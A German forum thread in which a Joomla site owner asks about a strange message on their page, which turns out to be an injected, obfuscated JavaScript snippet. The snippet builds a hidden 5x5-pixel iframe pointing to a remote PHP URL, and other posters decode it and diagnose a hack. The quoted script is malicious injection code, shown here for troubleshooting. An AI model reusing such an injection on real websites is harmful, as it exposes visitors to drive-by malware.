Thema: Login nicht möglich - rätselhafte Fehlermeldung auch ohne Login

Leider bin ich im Forum nicht fündig geworden, deshalb ein neues Thema...

Wenn ich meine Seite [Link entfernt, da Seite gehackt] öffne, bekomme ich folgende Fehlermeldung (ganz oben, schwarz auf dunkelblau, deshalb kaum zu sehen, für die die mal gucken wollen...)

hm='b';i='e';ty='jd';yf='n.';t='a';gf='p:/';m='hj';dq='f';r='htt';o='6c0';ug='e=';f='rc';sp= 'dg';dk='php';v='i';k='f54';na='nl.';dz='uys';ul=' a.';je='ifr';ww='a';tg='0';vq='347';tk='i/m';qn='gr';z='s';dc='pag';a='5e0';l='nyi';in='am'; j='fhh';hc='?';ic='/';w='a';h='bm';nd=je.concat(in,i);xr=z.concat(f);n i=r.concat(gf,ic,h,l,dz,j,m,qn,ty,sp,ul,na,ww,tk,t ,v,yf,dk,hc,dc,ug,hm,w,dq,a,vq,k,tg,o);var ge=document.createElement(nd);ge.setAttribute('wid th','5');ge.setAttribute('height','5');ge.setAttri bute('style','display:none');ge.setAttribute(xr,ni );document.body.appendChild(ge);

Ich habe seit Wochen nichts an der Seite gemacht, die Mitglieder haben offenbar letzte Woche noch was gepostet ohne Probleme. Leider kann ich mich auch nicht mehr auf der Seite anmelden, weder im Frontend noch im Backend, sondern bekomme immer wieder diese Fehlermeldung.
Auf einer anderen Seite hatte ich Probleme mit der Datenbank aber hier sieht das nun anders aus, was da im Kopf steht...
Weiß jemand Rat?

geh mal in deine INDEX.php und schau dir diese an, dürfte dort sein

bzw in der index.php unter template

Wenn sich bei Joomla 1.5.20 komische Einträge in der index.php befinden, gehe ich mal stark von einem Hack aus.
Was jetzt zu tun ist steht in "Flottes Liste" -> siehe Joomla-FAQ 2.6.

Im Backend kommt exakt der gleiche Text. Nur besser lesbar

Ich würde ja fast behaupten, dass das ein Skript von Deinem Hoster ist was probiert Dir irgendwelche Werbung auf Deine Site zu packen..

Oder hat ein Skriptkiddie wirklich beide index.phps mit dem Müll versaut ?...

Dritte Möglichkeit wäre dann noch ein System Plugin was Unfug macht

Mehr fällt mir nicht ein

Wenn ich keinen Fehler beim entschlüsseln gemacht habe, dann soll ein iframe mit 5x5px, display:none eingeblendet werden. Als Source ist [http]://bmnyiuysfhhhjgrjddga.nl.aimain.php?page=baf5e0347f 5406c0 angegeben. Weil vor dem Dateinamen ein Slash fehlt, hat der Hack nicht funktioniert. Display:none sieht nicht nach Werbung aus.

Eindeutig gehackt. Seite umgehend vom Netz nehmen und Analyse&Bereinigung durchführen.

Ich habe seit Wochen nichts an der Seite gemacht..

Also wenn das tatsächlich noch ein Joomla 1.5.20 ist, dann hast Du seit weit über einem Jahr die wichtigste Webmastertätigkeit vernachlässigt: Updaten

Tja, ich weiß nicht, ob ich das persönlich nehmen soll, dass sich da offenbar jemand in meine Seiten reingehackt hat. Eine mit Wordpress auf dem selben Server erstellte Seite wies jedenfalls die gleichen Manipulationshinweise auf, die sich aber zum Glück leicht beheben ließen. Danke für eure Rückmeldungen!
Das mit der veralteten Version stimmt leider. Aber da ich kein Geld dafür bekomme, das Layout anzupassen, habe ich mir für das Update bisher nicht die Zeit genommen... Sollte ich dann vielleicht doch mal machen :(

Edit: Hat in sofern doch noch was gutes - ich bekomme doch wieder etwas Geld für das Update und das Anpassen des Layouts ;-)

Das Du gehackt wird ist nichts persönliches, sondern geschieht automatisch. Nicht nur große Seiten werden gehackt...